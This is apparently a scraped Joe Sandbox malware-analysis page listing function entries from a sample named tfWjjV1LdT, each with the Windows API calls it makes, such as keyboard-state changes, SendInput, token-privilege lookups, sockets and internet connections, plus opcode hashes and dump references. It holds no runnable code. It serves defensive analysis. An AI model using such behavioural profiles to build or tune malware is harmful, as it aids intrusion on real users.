Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: fabd8e4268ab06f458d0a6aac6244ace41676945dc982707a0dae2696f3814f9
Instruction ID: 89cba7b801b27e73cc9918129c46ef3acbb44fab1575222eb87b4e60e3ba5a70
Opcode Fuzzy Hash: fabd8e4268ab06f458d0a6aac6244ace41676945dc982707a0dae2696f3814f9
Instruction Fuzzy Hash: 8B510974B013819EDF60AF6AC89167AB7E7AF24350F20D82FF586DB291EB34D8418715

Function 007197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00D2EF50,?), ref: 00719863
ScreenToClient.USER32(00000002,00000002), ref: 00719896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00719903

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 51995a103ccd57ef1a8e556334e8747866ac2a877999a33aec2472706b7506fb
Instruction ID: 045b959b995ab39481ef4c65b64c0a53d6c1488c8f7ba9625db52b3ee9b14a2e
Opcode Fuzzy Hash: 51995a103ccd57ef1a8e556334e8747866ac2a877999a33aec2472706b7506fb
Instruction Fuzzy Hash: ED513D34A00209EFCF14CF68C894AEE7BB5FF95360F148169F9559B2A0D735AD82CB90

Function 006E9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006E9AD2
__itow.LIBCMT ref: 006E9B03

Part of subcall function 006E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 006E9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 006E9B6C
__itow.LIBCMT ref: 006E9BC3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: b630ded3fe0844c45e7fc474a08b4091ec98205b86975ec458bd1cac5591380e
Instruction ID: be4ea1fe2da74c735e974d69b75ce87dc9b90494776bf000f180fdd8740b5985
Opcode Fuzzy Hash: b630ded3fe0844c45e7fc474a08b4091ec98205b86975ec458bd1cac5591380e
Instruction Fuzzy Hash: EF418F70A00349ABDF25EF65D846BFE7BBAEF44720F000069F905A7391DB709A45CBA5

Function 007069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007069D1
WSAGetLastError.WSOCK32(00000000), ref: 007069E1

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00706A45
WSAGetLastError.WSOCK32(00000000), ref: 00706A51

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 9b7f9bf6eb2b4d889111cc0abdfe972605732129466c4eaa9c27f7f473d5c24f
Instruction ID: 0c3fd4bd8dfea33ec09e1de9952ea5c52d5e91719e0aa88169ac1b9bf5140ea8
Opcode Fuzzy Hash: 9b7f9bf6eb2b4d889111cc0abdfe972605732129466c4eaa9c27f7f473d5c24f
Instruction Fuzzy Hash: 0B418F75740200AFEBA0AF28CC86F7A77E99F45B14F04C51CFA19AB6C2DA749D008795

Function 0070641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0071F910), ref: 007064A7
_strlen.LIBCMT ref: 007064D9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a3d284da022b16028a0ce4a0c5fa4092f2ac464f5ff4805dd2ea213e2b690434
Instruction ID: ad957b9b24fd16e269dd65c79bb3bc8aafffd617669aef31e13176eb7969c034
Opcode Fuzzy Hash: a3d284da022b16028a0ce4a0c5fa4092f2ac464f5ff4805dd2ea213e2b690434
Instruction Fuzzy Hash: EE419571600104EBCB54EBA8DC95EBEB7EAAF04310F14825DF915972D6DB34AD10C754

Function 006FB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006FB89E
GetLastError.KERNEL32(?,00000000), ref: 006FB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006FB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006FB915

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8d1c4a6eee54dbf7e8e7dd28da894645d2828607a39d6c2e7ce4bc898f670fda
Instruction ID: e5d07dc3d16c9c316e5520a74f4527a0fa7addc5a0b52409e1f75df7390d07d3
Opcode Fuzzy Hash: 8d1c4a6eee54dbf7e8e7dd28da894645d2828607a39d6c2e7ce4bc898f670fda
Instruction Fuzzy Hash: A0412A39600514DFCF50EF28C585A59BBEAAF4A310F09849CED4A9B762DB34FD01CBA5

Function 00718851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007188DE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ffaf8c922f291f37ee09ad0863f32ac74f962191212f45a8aa5a39f9f8f82893
Instruction ID: 77acadb1626f7480bf126594a8669e0a1daf42b358ca3aac4e3e5ecf4e6c2bef
Opcode Fuzzy Hash: ffaf8c922f291f37ee09ad0863f32ac74f962191212f45a8aa5a39f9f8f82893
Instruction Fuzzy Hash: 9031B434610108AFEFA09A5CCC45BF877A5EB06350F544112FA15E62E1CE7CF9C09757

Function 0071AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0071AB60
GetWindowRect.USER32(?,?), ref: 0071ABD6
PtInRect.USER32(?,?,0071C014), ref: 0071ABE6
MessageBeep.USER32(00000000), ref: 0071AC57

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9f0daf691a3cd21bae834b09fe8a94d82b4a869faafeeaa967e949d4383e51e0
Instruction ID: 9e77c19b3417b83baa5596e5acfeed1d04773bf455dcf8ee9dc25bf12acf8d85
Opcode Fuzzy Hash: 9f0daf691a3cd21bae834b09fe8a94d82b4a869faafeeaa967e949d4383e51e0
Instruction Fuzzy Hash: F5416170601219EFCB21DF5CD894AE97BF6FB49311F1480A5E4159B2A1D738A881CBA2

Function 006F0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006F0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 006F0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006F0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006F0BFB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
Instruction ID: f3434602075986d8e5fd3935d61e968cce80cdc67a4426d0e1fee2fa619ac84d
Opcode Fuzzy Hash: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
Instruction Fuzzy Hash: A6316C70D4031CAFFF308B298C05BFABBA7AB45318F14835AF680522D3C37A89559755

Function 006F0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 006F0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 006F0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 006F0CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 006F0D33

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
Instruction ID: d2f827c14605326d33ccc4a072c2104f29bf8a6f30f7cd9702151d2324cb8811
Opcode Fuzzy Hash: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
Instruction Fuzzy Hash: 5B31587094431CAEFF308B698C157FEBBA7AF49320F14831EE694522D3C33999558755

Function 006C61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C61FB
__isleadbyte_l.LIBCMT ref: 006C6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C628D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e43ce311e9bc2e159ae4d75c27df9c6f143c0549c5770f05ee5807298bed7c43
Instruction ID: 14a742546517d1be47782577e26ee6c718a356bd3bb01608bd7ddb92e16f8c56
Opcode Fuzzy Hash: e43ce311e9bc2e159ae4d75c27df9c6f143c0549c5770f05ee5807298bed7c43
Instruction Fuzzy Hash: C431CE31604246AFDB218F69CC48FBA7BAAFF41310F15402CF864872A1E735DA91DB98

Function 00714EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00714F02

Part of subcall function 006F3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006F365B
Part of subcall function 006F3641: GetCurrentThreadId.KERNEL32 ref: 006F3662
Part of subcall function 006F3641: AttachThreadInput.USER32(00000000,?,006F5005), ref: 006F3669

GetCaretPos.USER32(?), ref: 00714F13
ClientToScreen.USER32(00000000,?), ref: 00714F4E
GetForegroundWindow.USER32 ref: 00714F54

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 551b36dc17493eeed563482666ca0126d518633fc8a91c69854c629145e17424
Instruction ID: b61372312ff9784a33dfb5cd8d6b115688d7f06e30843c9b6057c496582eee09
Opcode Fuzzy Hash: 551b36dc17493eeed563482666ca0126d518633fc8a91c69854c629145e17424
Instruction Fuzzy Hash: 0D312C71D00108AFCB40EFA9C9859EFB7FEEF99300F10446EE415E7241EA759E458BA4

Function 0071C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

GetCursorPos.USER32(?), ref: 0071C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006CB9AB,?,?,?,?,?), ref: 0071C4E7
GetCursorPos.USER32(?), ref: 0071C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006CB9AB,?,?,?), ref: 0071C56E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d6fe52c799384b1d7ded31277471532cb3811a670ec5babbc45b93951a80653a
Instruction ID: efb7a51e872c4a4ff7ef23dfce0141cd74d764cac722f408449d72fff963db76
Opcode Fuzzy Hash: d6fe52c799384b1d7ded31277471532cb3811a670ec5babbc45b93951a80653a
Instruction Fuzzy Hash: CD31A735500458BFCF16CF9CD854DEA7BB7EB09310F548069F9058B2A1C7396DA0DBA4

Function 006E8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8121
Part of subcall function 006E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E812B
Part of subcall function 006E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E813A
Part of subcall function 006E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8141
Part of subcall function 006E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E86A3
_memcmp.LIBCMT ref: 006E86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E86FC
HeapFree.KERNEL32(00000000), ref: 006E8703

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 59a1fdc158a94917fcc3da4a63bfdfe116029d87717ba13ef180a79771cb03a9
Instruction ID: e40bf867e3c9c1d1d3bb18b5571d0b34ad12523f3bc7ee4b0fb7b9184983402d
Opcode Fuzzy Hash: 59a1fdc158a94917fcc3da4a63bfdfe116029d87717ba13ef180a79771cb03a9
Instruction Fuzzy Hash: 2621A471D41249EFDB10DF99C949BEEB7B9FF54308F158059E448A7240DB31AE05CB54

Function 006B098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 006B09AE

Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50

_fprintf.LIBCMT ref: 006B09E5
OutputDebugStringW.KERNEL32(?), ref: 006E5DBB

Part of subcall function 006B4AAA: _flsall.LIBCMT ref: 006B4AC3

__setmode.LIBCMT ref: 006B0A1A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 1df36e92690e4f9ba927a0e45b6f12aec979d116e164b0767965539a65e818ef
Instruction ID: e083597968ec207ac2a2d3af18dc4c593d9e976aa4d282335da6b66dbad76107
Opcode Fuzzy Hash: 1df36e92690e4f9ba927a0e45b6f12aec979d116e164b0767965539a65e818ef
Instruction Fuzzy Hash: 2F1136B2A046086FEB44B7B89C879FE7BAF9F41320F20015DF10557283EE70588287AD

Function 00701767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007017A3

Part of subcall function 0070182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0070184C
Part of subcall function 0070182D: InternetCloseHandle.WININET(00000000), ref: 007018E9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
Instruction ID: 9c3981818baff76ec13fa9b90cbe0f6155b84fecffe1ba43f693fdbcb42a2cae
Opcode Fuzzy Hash: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
Instruction Fuzzy Hash: EE21D732200601FFDB125F64CC05FBAB7E9FF48B10F508229F905966D1DB7999119790

Function 006F3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0071FAC0), ref: 006F3A64
GetLastError.KERNEL32 ref: 006F3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 006F3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0071FAC0), ref: 006F3ADF

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 223be4851fbb6ffa4042b8e4a1121a93fe0eda32d910be8ea24126eb97a7233a
Instruction ID: 7b68bedc2fc8ad5812d4c6b2fabcd631a3ee67586bf5727391052d298375cdb9
Opcode Fuzzy Hash: 223be4851fbb6ffa4042b8e4a1121a93fe0eda32d910be8ea24126eb97a7233a
Instruction Fuzzy Hash: 842191745082159F8700EF39C8818BAB7E9BE56364F108A2DF599C73E1D731DA46CB46

Function 006C50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006C5101

Part of subcall function 006B571C: __FF_MSGBANNER.LIBCMT ref: 006B5733
Part of subcall function 006B571C: __NMSG_WRITE.LIBCMT ref: 006B573A
Part of subcall function 006B571C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 168dfac6e901eb54d297dee3559e6f2b50157cdc8d4f7727f677ca4ac235dbec
Instruction ID: 0b931f564060435ca3086ef617a40ede732ca02ade610d720d67afe849910a07
